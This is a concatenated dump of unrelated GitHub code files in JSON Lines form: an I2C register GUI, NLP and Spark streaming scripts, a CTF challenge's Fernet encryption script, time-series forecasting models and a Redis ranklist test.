0x09)\n\toutput_blank_0x09.insert(0,bin(bits))\ndef write0x09():\n\tbits = bus.read_byte_data(0x55, 0x09)\n\tentry_val = entry_0x09_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x09, int(final,2))\n\naddress_0x09 = tk.Label(root, text=\"0x09\")\ndescription_0x09 = tk.Label(root, text=\"\")\nentry_0x09_04 = tk.Entry(root,width=5)\ninput_text_0x09 = tk.Label(root, text=\"5-o.c DAC override\",font=fontStyle)\noutput_text_0x09 = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x09 = tk.Entry(root, width=10)\nread_0x09_button = tk.Button(root, text='Read', command=lambda:[delete0x09(), read0x09()])\nwrite_0x09_button = tk.Button(root, text='Write', command=write0x09)\n\naddress_0x09.grid(row=18, column=0)\ndescription_0x09.grid(row=18, column=1)\nentry_0x09_04.grid(row=18, column=2)\ninput_text_0x09.grid(row=19, column=2)\noutput_text_0x09.grid(row=18, column=6)\noutput_blank_0x09.grid(row=18, column=7)\nread_0x09_button.grid(row=18, column=8)\nwrite_0x09_button.grid(row=18, column=9)\n\ndef delete0x0A():\n output_blank_0x0A.delete(0, 'end')\ndef read0x0A():\n\tbits = bus.read_byte_data(0x55, 0x0A)\n\toutput_blank_0x0A.insert(0,bin(bits))\ndef write0x0A():\n\tbits = bus.read_byte_data(0x55, 0x0A)\n\tentry_val = entry_0x0A_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0A, int(final,2))\n\naddress_0x0A = tk.Label(root, text=\"0x0A\")\ndescription_0x0A = tk.Label(root, text=\"LED CONTROL\",font=fontStyle)\nentry_0x0A_04 = tk.Entry(root,width=5)\ninput_text_0x0A = tk.Label(root, text=\"5-LED BIAS\",font=fontStyle)\noutput_text_0x0A = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0A = tk.Entry(root, width=10)\nread_0x0A_button = tk.Button(root, text='Read', command=lambda:[delete0x0A(), read0x0A()])\nwrite_0x0A_button = tk.Button(root, text='Write', 
command=write0x0A)\n\naddress_0x0A.grid(row=20, column=0)\ndescription_0x0A.grid(row=20, column=1)\nentry_0x0A_04.grid(row=20, column=2)\ninput_text_0x0A.grid(row=21, column=2)\noutput_text_0x0A.grid(row=20, column=6)\noutput_blank_0x0A.grid(row=20, column=7)\nread_0x0A_button.grid(row=20, column=8)\nwrite_0x0A_button.grid(row=20, column=9)\n\ndef delete0x0B():\n output_blank_0x0B.delete(0, 'end')\ndef read0x0B():\n\tbits = bus.read_byte_data(0x55, 0x0B)\n\toutput_blank_0x0B.insert(0,bin(bits))\ndef write0x0B():\n\tbits = bus.read_byte_data(0x55, 0x0B)\n\tentry_val = entry_0x0B_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0B, int(final,2))\n\naddress_0x0B = tk.Label(root, text=\"0x0B\")\ndescription_0x0B = tk.Label(root, text=\"\")\nentry_0x0B_04 = tk.Entry(root,width=5)\ninput_text_0x0B = tk.Label(root, text=\"5-LED MOD\",font=fontStyle)\noutput_text_0x0B = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0B = tk.Entry(root, width=10)\nread_0x0B_button = tk.Button(root, text='Read', command=lambda:[delete0x0B(), read0x0B()])\nwrite_0x0B_button = tk.Button(root, text='Write', command=write0x0B)\n\naddress_0x0B.grid(row=22, column=0)\ndescription_0x0B.grid(row=22, column=1)\nentry_0x0B_04.grid(row=22, column=2)\ninput_text_0x0B.grid(row=23, column=2)\noutput_text_0x0B.grid(row=22, column=6)\noutput_blank_0x0B.grid(row=22, column=7)\nread_0x0B_button.grid(row=22, column=8)\nwrite_0x0B_button.grid(row=22, column=9)\n\ndef delete0x0C():\n output_blank_0x0C.delete(0, 'end')\ndef read0x0C():\n\tbits = bus.read_byte_data(0x55, 0x0C)\n\toutput_blank_0x0C.insert(0,bin(bits))\ndef write0x0C():\n\tbits = bus.read_byte_data(0x55, 0x0C)\n\tentry_val = entry_0x0C_01.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:6]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0C, int(final,2))\n\naddress_0x0C = tk.Label(root, text=\"0x0C\")\ndescription_0x0C = tk.Label(root, text=\"\")\nentry_0x0C_01 = tk.Entry(root,width=2)\ninput_text_0x0C = tk.Label(root, text=\"2-LED boost\",font=fontStyle)\noutput_text_0x0C = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0C = tk.Entry(root, width=10)\nread_0x0C_button = tk.Button(root, text='Read', command=lambda:[delete0x0C(), read0x0C()])\nwrite_0x0C_button = tk.Button(root, text='Write', command=write0x0C)\n\naddress_0x0C.grid(row=24, column=0)\ndescription_0x0C.grid(row=24, column=1)\nentry_0x0C_01.grid(row=24, column=2)\ninput_text_0x0C.grid(row=25, column=2)\noutput_text_0x0C.grid(row=24, column=6)\noutput_blank_0x0C.grid(row=24, column=7)\nread_0x0C_button.grid(row=24, column=8)\nwrite_0x0C_button.grid(row=24, column=9)\n\ndef delete0x0D():\n output_blank_0x0D.delete(0, 'end')\ndef read0x0D():\n\tbits = bus.read_byte_data(0x55, 0x0D)\n\toutput_blank_0x0D.insert(0,bin(bits))\ndef write0x0D():\n\tbits = bus.read_byte_data(0x55, 0x0D)\n\tentry_val = entry_0x0D_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0D, int(final,2))\n\naddress_0x0D = tk.Label(root, text=\"0x0D\")\ndescription_0x0D = tk.Label(root, text=\"\")\nentry_0x0D_04 = tk.Entry(root,width=5)\ninput_text_0x0D = tk.Label(root, text=\"5-Input signal reference\",font=fontStyle)\noutput_text_0x0D = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0D = tk.Entry(root, width=10)\nread_0x0D_button = tk.Button(root, text='Read', command=lambda:[delete0x0D(), 
read0x0D()])\nwrite_0x0D_button = tk.Button(root, text='Write', command=write0x0D)\n\naddress_0x0D.grid(row=26, column=0)\ndescription_0x0D.grid(row=26, column=1)\nentry_0x0D_04.grid(row=26, column=2)\ninput_text_0x0D.grid(row=27, column=2)\noutput_text_0x0D.grid(row=26, column=6)\noutput_blank_0x0D.grid(row=26, column=7)\nread_0x0D_button.grid(row=26, column=8)\nwrite_0x0D_button.grid(row=26, column=9)\n\ndef delete0x0E():\n output_blank_0x0E.delete(0, 'end')\ndef read0x0E():\n\tbits = bus.read_byte_data(0x55, 0x0E)\n\toutput_blank_0x0E.insert(0,bin(bits))\ndef write0x0E():\n\tbits = bus.read_byte_data(0x55, 0x0E)\n\tentry_val = entry_0x0E_04.get()\n\tkeep = format(int(bits), \"b\")\n\tkeep = keep[:3]\n\tfinal = str(keep) + str(entry_val)\n\tbus.write_byte_data(0x55, 0x0E, int(final,2))\n\naddress_0x0E = tk.Label(root, text=\"0x0E\")\ndescription_0x0E = tk.Label(root, text=\"\")\nentry_0x0E_04 = tk.Entry(root,width=5)\ninput_text_0x0E = tk.Label(root, text=\"5-Common Mod Ref\",font=fontStyle)\noutput_text_0x0E = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0E = tk.Entry(root, width=10)\nread_0x0E_button = tk.Button(root, text='Read', command=lambda:[delete0x0E(), read0x0E()])\nwrite_0x0E_button = tk.Button(root, text='Write', command=write0x0E)\n\naddress_0x0E.grid(row=28, column=0)\ndescription_0x0E.grid(row=28, column=1)\nentry_0x0E_04.grid(row=28, column=2)\ninput_text_0x0E.grid(row=29, column=2)\noutput_text_0x0E.grid(row=28, column=6)\noutput_blank_0x0E.grid(row=28, column=7)\nread_0x0E_button.grid(row=28, column=8)\nwrite_0x0E_button.grid(row=28, column=9)\n\ndef delete0x0F():\n output_blank_0x0F.delete(0, 'end')\ndef read0x0F():\n\tbits = bus.read_byte_data(0x55, 0x0F)\n\toutput_blank_0x0F.insert(0,bin(bits))\ndef write0x0F():\n\tbits = bus.read_byte_data(0x55, 0x0F)\n\tentry_val = entry_0x0F_76.get()\n\tentry_val_2 = entry_0x0F_53.get()\n\tentry_val_3 = entry_0x0F_21.get()\n\tentry_val_4 = entry_0x0F_0.get()\n\tfinal = str(entry_val) + str(entry_val_2) + str(entry_val_3) + str(entry_val_4)\n\tbus.write_byte_data(0x55, 0x0F, int(final,2))\n\naddress_0x0F = tk.Label(root, text=\"0x0F\")\ndescription_0x0F = tk.Label(root, text=\"\")\nentry_0x0F_76 = tk.Entry(root,width=2)\nentry_0x0F_53 = tk.Entry(root,width=3)\nentry_0x0F_21 = tk.Entry(root,width=2)\nentry_0x0F_0 = tk.Entry(root,width=1)\ninput_text_0x0F = tk.Label(root, text=\"2-spare bits\",font=fontStyle)\ninput_text_0x0F_2 = tk.Label(root, text=\"3-test_mux8\",font=fontStyle)\ninput_text_0x0F_22 = tk.Label(root, text=\"\\n0-nothing\\n1-REFH\\n2-REFL\\n3-compref\\n4-VDD12ref\\n5-DAC1INN\\n6-DACINP\\n7-VOCMFP\",font=fontStyle)\ninput_text_0x0F_3 = tk.Label(root, text=\"2-test_mux\",font=fontStyle)\ninput_text_0x0F_33 = tk.Label(root, text=\"\\n0-TIA REF\\n1-VBIAS18\",font=fontStyle)\ninput_text_0x0F_4 = tk.Label(root, text=\"1-Protect LED driver\",font=fontStyle)\noutput_text_0x0F = tk.Label(root, text=\"output: \",font=fontStyle)\noutput_blank_0x0F = tk.Entry(root, width=10)\nread_0x0F_button = tk.Button(root, text='Read', command=lambda:[delete0x0F(), read0x0F()])\nwrite_0x0F_button = tk.Button(root, text='Write', command=write0x0F)\n\naddress_0x0F.grid(row=30, column=0)\ndescription_0x0F.grid(row=30, column=1)\nentry_0x0F_76.grid(row=30, column=2)\nentry_0x0F_53.grid(row=30, column=3)\nentry_0x0F_21.grid(row=30, column=4)\nentry_0x0F_0.grid(row=30, column=5)\ninput_text_0x0F.grid(row=31, column=2)\ninput_text_0x0F_2.grid(row=31, column=3)\ninput_text_0x0F_3.grid(row=31, 
column=4)\ninput_text_0x0F_22.grid(row=32, column=3)\ninput_text_0x0F_33.grid(row=32, column=4)\ninput_text_0x0F_4.grid(row=31, column=5)\noutput_text_0x0F.grid(row=30, column=6)\noutput_blank_0x0F.grid(row=30, column=7)\nread_0x0F_button.grid(row=30, column=8)\nwrite_0x0F_button.grid(row=30, column=9)\n\n\nroot.mainloop()\n\n","repo_name":"satselikov/gui","sub_path":"extra/i2c.py","file_name":"i2c.py","file_ext":"py","file_size_in_byte":21268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74259740408","text":"from data.vocabulary import vocab\nfrom data.raw_data import *\nimport gensim\nfrom nltk.stem import SnowballStemmer\n\nword2vec_path = base_dir + \"GoogleNews-vectors-negative300.bin.gz\"\nword2vec = gensim.models.KeyedVectors.load_word2vec_format(word2vec_path, binary=True)\n\nwith open(base_dir + 'GoogleNews-vectors-negative300-subset.txt', mode='w') as output_file:\n    for word in vocab:\n        if word in word2vec:\n            vec = word2vec[word]\n            word_and_vec = []\n            word_and_vec.append(word)\n            for num in vec:\n                word_and_vec.append(str(num)) # str() because ' '.join() below only accepts strings\n            word_and_vec_str = ' '.join(word_and_vec)\n            output_file.write(word_and_vec_str + '\\n')","repo_name":"l294265421/toxic-comment-classification-challenge","sub_path":"data/google_news_vector_negtive200_subset.py","file_name":"google_news_vector_negtive200_subset.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17210667818","text":"\nimport os\nimport yaml\nimport markdown\nimport csv\nfrom itertools import combinations\n\nimport json \n\nimport datetime\n\nnode_list={}\nlang=[\"fr\",\"en\",\"pt\",\"es\"]\naut_keys=[\"authors\",\"reviewers\",\"editors\"]\ntl_keys=[\"translator\",\"translation-editor\",\"translation-reviewer\"]\ndict_lessons={}\nmd = markdown.Markdown(extensions = ['meta'])\npath=\"C:/Users/Celian/Desktop/PH_study/jekyll/\"\nfor l in lang:\n    directory=path+l\n    dd=[ f.path for f in os.scandir(directory) if f.is_dir() ]\n    for d in dd:\n        files=[ f.path for f in os.scandir(d) if f.is_file() and \".md\" in f.path ]\n        for f_name in files:\n            with open(f_name, \"r\", encoding='utf-8') as f:\n                lines = f.read()\n                html = md.convert(lines)\n                meta=lines[lines.find(\"---\")+3:lines[lines.find(\"---\")+1:].find(\"---\")]\n                dct = yaml.safe_load(meta)\n                dct[\"lang\"]=l\n                for k in dct.keys():\n                    if isinstance(dct[k], datetime.date):\n                        dct[k]=str(dct[k])\n                        print(dct[k])\n                if(\"slug\" in dct.keys()):\n                    dict_lessons[dct[\"slug\"].lower().replace(\"\\n\",\"\").replace(\" \",\"-\")]=dct\n                elif(\"redirect_from\" in dct.keys()):\n                    dict_lessons[dct[\"redirect_from\"].replace(\"/lessons/\",\"\").lower()]=dct\n                else:\n                    dict_lessons[dct[\"title\"].lower().replace(\"\\n\",\"\").replace(\" \",\"-\")]=dct\n    \n# file=\"C:/Users/Celian/Desktop/PH_DHnord/PH_analysis/data/dict_lessons_clean.json\"\n# with open(file, 'w') as outfile:\n#     json.dump(dict_lessons, outfile)\n    \nwith open(\"C:/Users/Celian/Desktop/PH_DHnord/PH_analysis/data/dict_lessons_clean.json\", 'rb') as f:\n    dict_lessons = json.load(f) \nres_trad={\"fr\":{},\"en\":{},\"pt\":{},\"es\":{}}\nfor t in dict_lessons.keys():\n    if(\"translation_date\" in dict_lessons[t].keys()):\n        lang=dict_lessons[t][\"lang\"]\n        try:\n            orig=dict_lessons[t][\"original\"].lower().replace(\"\\n\",\"\").replace(\"_\",\"-\").replace(\" \",\"-\")\n            if(orig==\"analisis-de-sentimientos-r\"):\n                
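# special case: this lesson's 'original' slug does not match any stored key, so remap it by hand\n                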
orig=\"analise-sentimento-R-syuzhet\".lower().replace(\"\\n\",\"\").replace(\"_\",\"-\").replace(\" \",\"-\")\n original_lang=dict_lessons[orig][\"lang\"]\n if(original_lang not in res_trad[lang].keys()):\n res_trad[lang][original_lang]=1\n else:\n res_trad[lang][original_lang]+=1\n except:\n print(dict_lessons[t][\"original\"])\n","repo_name":"datalogism/PH_analysis","sub_path":"python_scripts/create_dict_lessons.py","file_name":"create_dict_lessons.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3828531020","text":"from pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\nimport os\nimport sys\nimport json\n\nif __name__ == \"__main__\":\n os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.1.1 pyspark-shell'\n \n # Create Streaming Context and set batch interval\n conf = SparkConf().setMaster(\"local[*]\").setAppName(\"twitter-sentiment\")\n sc = SparkContext.getOrCreate(conf = conf)\n sc.setLogLevel(\"WARN\")\n sc.setCheckpointDir(\"./checkpoints\")\n ssc = StreamingContext(sc, 5)\n\n brokers = \"localhost:9092\"\n topic = [sys.argv[1]]\n kafkaParams = {\"metadata.broker.list\": \"localhost:9092\",\n \"zookeeper.connect\": \"localhost:2181\",\n \"group.id\": \"kafka-spark-streaming\",\n \"zookeeper.connection.timeout.ms\": \"1000\"}\n kafkaStream = KafkaUtils.createDirectStream(ssc, topic, kafkaParams)\n tweet = kafkaStream.map(lambda value: json.loads(value[1])). \\\n map(lambda json_object: (json_object[\"user\"][\"screen_name\"], json_object[\"text\"]))\n tweet.pprint()\n ssc.start()\n ssc.awaitTermination()\n \n \n \n \n \n# from pyspark import SparkContext, SparkConf\n# from pyspark.streaming import StreamingContext\n# from pyspark.streaming.kafka import KafkaUtils\n# import os\n# import sys\n\n# if __name__ == \"__main__\":\n# os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.1.1 pyspark-shell'\n \n\n \n\n\n# kafkaStream = KafkaUtils.createDirectStream(ssc, topic, kafkaParams)\n \n# raw = kafkaStream.flatMap(lambda kafkaS: [kafkaS])\n# print(raw)\n# print(type(raw))\n \n# # lines = kafkaStream.map(lambda x: x[1])\n# # lines.pprint()\n# # ssc.start()\n# # ssc.awaitTermination()\n \n# # lines = kvs.map(lambda x: x[1])\n# # counts = lines.flatMap(lambda line: line.split(\" \")) \\\n# # .map(lambda word: (word, 1)) \\\n# # .reduceByKey(lambda a, b: a+b)\n# # counts.pprint()\n# ssc.start()\n# ssc.awaitTermination()","repo_name":"fadhilmch/streaming-traffic-visualization","sub_path":"kafkaStreaming.py","file_name":"kafkaStreaming.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41621952401","text":"import os\nimport sys\nimport base64\nfrom cryptography.fernet import Fernet\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\n\nop = sys.argv[1]\nif op != \"encrypt\" and op != \"decrypt\":\n raise RuntimeError(f\"First argument must be 'encrypt' or 'decrypt', got {sys.argv}\")\n\nkey = [x.strip() for x in sys.argv[2:]]\n\nrotors = key[0:3]\nring_settings = key[3]\nplugboards = key[4:14]\nrotor_starts = key[14]\n\nfor i in range(len(plugboards)):\n if ord(plugboards[i][0]) > ord(plugboards[i][1]):\n plugboards[i] = plugboards[i][1] + 
plugboards[i][0]\r\nplugboards.sort()\r\n\r\nring_offset = ord(ring_settings[0]) - ord('A')\r\nring_settings = 'A' + ring_settings[1:]\r\n\r\nleft_rotor_start = chr(ord(rotor_starts[0]) - ring_offset)\r\nif ord(left_rotor_start) < ord('A'):\r\n    left_rotor_start = chr(ord(left_rotor_start) + 26)\r\nrotor_starts = left_rotor_start + rotor_starts[1:]\r\n\r\nkey = rotors + [ring_settings] + plugboards + [rotor_starts]\r\n\r\nkey = b\" \".join(x.encode(\"utf-8\") for x in key)\r\n\r\nif op == \"encrypt\":\r\n    salt = os.urandom(16)\r\nelse:\r\n    salt = sys.stdin.buffer.read(16)\r\nkdf = PBKDF2HMAC(\r\n    algorithm=hashes.SHA256(),\r\n    length=32,\r\n    salt=salt,\r\n    iterations=390000,\r\n)\r\nkey = base64.urlsafe_b64encode(kdf.derive(key))\r\nf = Fernet(key)\r\n\r\nif op == \"encrypt\":\r\n    plaintext = sys.stdin.buffer.read()\r\n    ciphertext = f.encrypt(plaintext)\r\n    sys.stdout.buffer.write(salt)\r\n    sys.stdout.buffer.write(ciphertext)\r\nelse:\r\n    ciphertext = sys.stdin.buffer.read()\r\n    plaintext = f.decrypt(ciphertext)\r\n    sys.stdout.buffer.write(plaintext)\r\n\r\n","repo_name":"google/google-ctf","sub_path":"2022/quals/crypto-enigma/encrypt_modern.py","file_name":"encrypt_modern.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":4153,"dataset":"github-code","pt":"77"} +{"seq_id":"17265565485","text":"from pmdarima import auto_arima\r\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\r\nimport pandas as pd\r\nfrom numpy import mean, std\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\nimport abc\r\nfrom datetime import date\r\nfrom fbprophet import Prophet\r\nimport numpy as np\r\nfrom scipy.optimize import minimize\r\n\r\nfrom evaluation import EvaluateModel\r\nfrom preprocessing import DataSplit\r\n\r\n\r\nclass TimeSeriesModel(object, metaclass=abc.ABCMeta):\r\n\r\n    def __init__(self, df, train_size=.8):\r\n        # Dividing into train and test set\r\n        self.train, self.test = DataSplit(train_size).sequential_split(df)\r\n\r\n    # Using abc.abstractmethod I force subclasses in the inheritance hierarchy to implement these methods\r\n    @abc.abstractmethod\r\n    def set_name(self):\r\n        pass\r\n\r\n    @abc.abstractmethod\r\n    def fit(self, **params):\r\n        pass\r\n\r\n    @abc.abstractmethod\r\n    def predict(self, **params):\r\n        pass\r\n\r\n\r\nclass Exponential_Smoothing(TimeSeriesModel):\r\n\r\n    def set_name(self):\r\n        self.name = 'Exponential Smoothing'\r\n\r\n    def fit(self, trend_effect='add', damped=True, seasonal_effect='add', seasonality=12, frequency='D',\r\n            use_boxcox=True):\r\n\r\n        self.trend = trend_effect\r\n        self.damped = damped\r\n        self.seasonal = seasonal_effect\r\n        self.seasonality = seasonality\r\n        self.frequency = frequency\r\n        self.use_boxcox = use_boxcox\r\n\r\n        self.fit = None\r\n\r\n        if self.trend not in ['add', 'mul', None]:\r\n            print('ERROR: Invalid value for trend effect! Allowed values are: add, mul or None')\r\n        elif self.seasonal not in ['add', 'mul', None]:\r\n            print('ERROR: Invalid value for seasonal effect! Allowed values are: add, mul or None')\r\n        elif self.use_boxcox not in [True, False]:\r\n            print('ERROR: Invalid value for use_boxcox! 
Allowed values are: True or False')\r\n        elif self.seasonality < 0 or self.seasonality > self.train.shape[0]:\r\n            print('ERROR: Invalid value for seasonality!')\r\n        elif not isinstance(self.seasonality, int):\r\n            print('ERROR: Seasonality must be an integer!')\r\n        else:\r\n            try:\r\n\r\n                self.fit = ExponentialSmoothing(endog=self.train, trend=self.trend, damped_trend=self.damped,\r\n                                                seasonal=self.seasonal, seasonal_periods=self.seasonality,\r\n                                                initialization_method='legacy-heuristic', freq=self.frequency).fit()\r\n\r\n            except:\r\n                print('ERROR: Could not run exponential smoothing! Please check your input data. \\n')\r\n\r\n        return self.fit\r\n\r\n    def predict(self, start, end):\r\n\r\n        self.start = start\r\n        self.end = end\r\n        self.forecast = None\r\n\r\n        try:\r\n            self.forecast = pd.DataFrame(self.fit.predict(self.start, self.end))\r\n        except:\r\n            print('ERROR: Could not forecast this time series using the Exponential Smoothing model.')\r\n\r\n        return self.forecast\r\n\r\n    def fit_cv(self, trend_effect='add', damped=True, seasonal_effect='add', seasonality=12, frequency='D',\r\n               use_boxcox=True, k=10):\r\n\r\n        self.trend = trend_effect\r\n        self.damped = damped\r\n        self.seasonal = seasonal_effect\r\n        self.seasonality = seasonality\r\n        self.frequency = frequency\r\n        self.use_boxcox = use_boxcox\r\n        self.fit = None\r\n        rmse_stats = []\r\n\r\n        if self.trend not in ['add', 'mul', None]:\r\n            print('ERROR: Invalid value for trend effect! Allowed values are: add, mul or None')\r\n        elif self.seasonal not in ['add', 'mul', None]:\r\n            print('ERROR: Invalid value for seasonal effect! Allowed values are: add, mul or None')\r\n        elif self.use_boxcox not in [True, False]:\r\n            print('ERROR: Invalid value for use_boxcox! Allowed values are: True or False')\r\n        elif self.seasonality < 0 or self.seasonality > self.train.shape[0]:\r\n            print('ERROR: Invalid value for seasonality!')\r\n        elif not isinstance(self.seasonality, int):\r\n            print('ERROR: Seasonality must be an integer!')\r\n        else:\r\n\r\n            self.forecast = None\r\n            try:\r\n                tscv = TimeSeriesSplit(n_splits=k)\r\n                for train_index, test_index in tscv.split(self.train): # The split function returns only indexes\r\n                    train = self.train.iloc[train_index]\r\n                    test = self.train.iloc[test_index]\r\n                    self.start = test.index[0]\r\n                    self.end = test.index[-1]\r\n                    self.fit = ExponentialSmoothing(endog=train, trend=self.trend, damped_trend=self.damped,\r\n                                                    seasonal=self.seasonal, seasonal_periods=self.seasonality,\r\n                                                    initialization_method='legacy-heuristic', freq=self.frequency).fit()\r\n                    self.forecast = pd.DataFrame(self.fit.predict(self.start, self.end))\r\n                    rmse_stats.append(EvaluateModel(test, self.forecast).rmse())\r\n\r\n                print(\"RMSE for exponential smoothing computed using cross validation: %0.2f (+/- %0.2f)\" % (\r\n                    mean(rmse_stats), std(rmse_stats) * 2))\r\n\r\n                # Select the best model considering the cross validation concept\r\n\r\n                self.fit = ExponentialSmoothing(endog=self.train, trend=self.trend, damped_trend=self.damped,\r\n                                                seasonal=self.seasonal, seasonal_periods=self.seasonality,\r\n                                                initialization_method='legacy-heuristic', freq=self.frequency).fit()\r\n\r\n            except:\r\n                print('ERROR: Could not run exponential smoothing! Please check your input data. 
\\n') # ) + ex.message)\r\n return self.fit\r\n\r\n\r\nclass AutoArima(TimeSeriesModel):\r\n\r\n def set_name(self):\r\n self.name = 'ARIMA'\r\n\r\n def fit(self, seasonal, seasonality):\r\n\r\n self.seasonal = seasonal\r\n if not isinstance(seasonality, int):\r\n self.fit = None\r\n print('ERROR: Invalid value for seasonality')\r\n else:\r\n self.seasonality = seasonality\r\n self.fit = auto_arima(self.train, seasonal=self.seasonal, m=self.seasonality)\r\n\r\n return self.fit\r\n\r\n def predict(self, start, end):\r\n\r\n self.start = start\r\n self.end = end\r\n\r\n n = abs(self.end - self.start).days + 1\r\n self.forecast = None\r\n\r\n try:\r\n self.forecast = pd.DataFrame(self.fit.predict(n))\r\n self.forecast['Date'] = pd.date_range(start=self.start, end=self.end)\r\n self.forecast.set_index('Date', inplace=True)\r\n except:\r\n print('ERROR: Could not forecast using ARIMA model this time series.')\r\n\r\n return self.forecast\r\n\r\n\r\nclass FBProphet(TimeSeriesModel):\r\n\r\n def set_name(self):\r\n self.name = 'Prophet'\r\n\r\n def fit(self, growth='linear', yearly_seasonality='auto', weekly_seasonality='auto',\r\n daily_seasonality='auto', holidays=None, seasonality_mode='additive'):\r\n\r\n self.growth = growth\r\n self.yearly_seasonality = yearly_seasonality\r\n self.weekly_seasonality = weekly_seasonality\r\n self.daily_seasonality = daily_seasonality\r\n self.holidays = holidays\r\n self.seasonality_mode = seasonality_mode\r\n\r\n # Renaming columns for the standard of Prophet library\r\n self.train['ds'] = self.train.index\r\n self.train['y'] = self.train['Sales']\r\n\r\n self.model = Prophet(growth=self.growth, yearly_seasonality=self.yearly_seasonality,\r\n weekly_seasonality=self.yearly_seasonality, daily_seasonality=self.daily_seasonality,\r\n holidays=self.holidays, seasonality_mode=self.seasonality_mode)\r\n self.fit = self.model.fit(self.train)\r\n\r\n return self.fit\r\n\r\n def predict(self, start, end):\r\n\r\n self.start = start\r\n self.end = end\r\n\r\n n = abs(self.end - self.start).days + 1\r\n self.forecast = None\r\n\r\n try:\r\n self.forecast = self.model.make_future_dataframe(\r\n periods=n) # create the dataframe with the future timestamp\r\n forecast = self.model.predict(self.forecast) # runs the forecast\r\n self.forecast['Sales'] = forecast.yhat # save the forecast on the dataframe\r\n self.forecast.rename(columns={'ds': 'Date'}, inplace=True)\r\n self.forecast.set_index('Date', inplace=True)\r\n # The Prophet will do the forecast for the whole period, so we take only the predictions that represent the interval\r\n self.forecast = self.forecast[-n:]\r\n\r\n except:\r\n print('ERROR: Could not forecast using Prophet model this time series.')\r\n\r\n return self.forecast\r\n\r\n\r\nclass EnsembleModels(object):\r\n\r\n def set_name(self):\r\n self.name = 'Ensemble'\r\n\r\n def __init__(self, *models_list):\r\n\r\n self.models = list(models_list)\r\n\r\n def predict(self, start, end, mode='average'):\r\n\r\n self.start = start\r\n self.end = end\r\n self.mode = mode\r\n self.len = len(self.models)\r\n self.weights = np.zeros(self.len)\r\n self.weights.fill(1 / self.len)\r\n\r\n for idx, model in enumerate(self.models):\r\n if idx == 0:\r\n forecast = model.predict(start=self.start, end=self.end)\r\n else:\r\n forecast['model_' + str(idx)] = model.predict(start=self.start, end=self.end)\r\n\r\n if self.mode == 'average':\r\n\r\n self.forecast = (forecast * self.weights).sum(axis=1)\r\n elif self.mode == 'optimized':\r\n\r\n # Using as criteria the RSME to 
choose the best weights\r\n fun = lambda w: EvaluateModel(model.test, (forecast * w).sum(axis=1)).rmse() # objective function\r\n cons = ({'type': 'eq', 'fun': lambda w: w.sum() - 1}) # constraint\r\n res = minimize(fun, self.weights, method='SLSQP', constraints=cons)\r\n self.weights = res.x\r\n self.forecast = (forecast * self.weights).sum(axis=1)\r\n\r\n print('weights', self.weights)\r\n else:\r\n print('WARNING: Invalid mode for generating the ensemble')\r\n\r\n return self.forecast\r\n\r\n","repo_name":"fonseca-erika/Time-Series","sub_path":"Univariate Models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12230434246","text":"import unittest\nimport redis\nimport time\nimport random\n\nfrom landport.core.rank import RanklistBase as Ranklist\n\n\n# your data / maybe from mysql/redis/mongodb, but here we use python dict\n# instead!\nuser_info_data = {\n \"1002922\": \"frank\",\n \"1002923\": \"jack\",\n \"1002924\": \"pig\"\n}\nrank_prize_data = {\n \"1\": {\"name\": \"iPhone\"},\n \"2~3\": {\"name\": \"iPod\"}\n}\n\n# your plugin function declare here ...\n\n\ndef add_profit(d):\n p = d.get(\"prize\") - d.get(\"gold\")\n d.update({\"profit\": p})\n\n\ndef add_userinfotmation(d):\n uid = d.get(\"uid\")\n username = user_info_data.get(uid)\n d.update({\"username\": username})\n\n\nclass TestRanklistBase(unittest.TestCase):\n\n def setUp(self):\n self.redis_connect = redis.Redis(\"127.0.0.1\", 6379, 0)\n\n def test_1_ranklist_push_in(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n rk.push_in(user_1)\n expect_result = [{\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\"\n }, ]\n self.assertEqual(rk.top(), expect_result)\n\n expect_result = {\n \"1002922\": {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\"\n }\n }\n 